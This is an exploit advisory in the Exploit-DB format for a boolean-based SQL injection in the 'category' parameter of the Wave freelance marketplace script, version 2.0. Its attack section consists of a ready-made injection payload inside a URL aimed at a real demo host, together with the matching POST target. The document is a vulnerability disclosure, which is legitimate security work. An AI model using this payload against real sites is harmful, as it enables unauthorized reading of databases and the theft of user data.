===========================================================================================
# Exploit Title: Wave - Powerful Freelance Marketplace System SQL Inj.
# Dork: N/A
# Date: 29-12-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Software Link: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Build a great and successful Freelance Marketplace Business with this System.
===========================================================================================
# POC - SQLi (Boolean Based)
# Parameters : category
# Attack Pattern : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999%27) oR 6841947=6841947 aNd (%276199%27)=(%276199
# POST Method : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999
# exploit-db.com :
===========================================================================================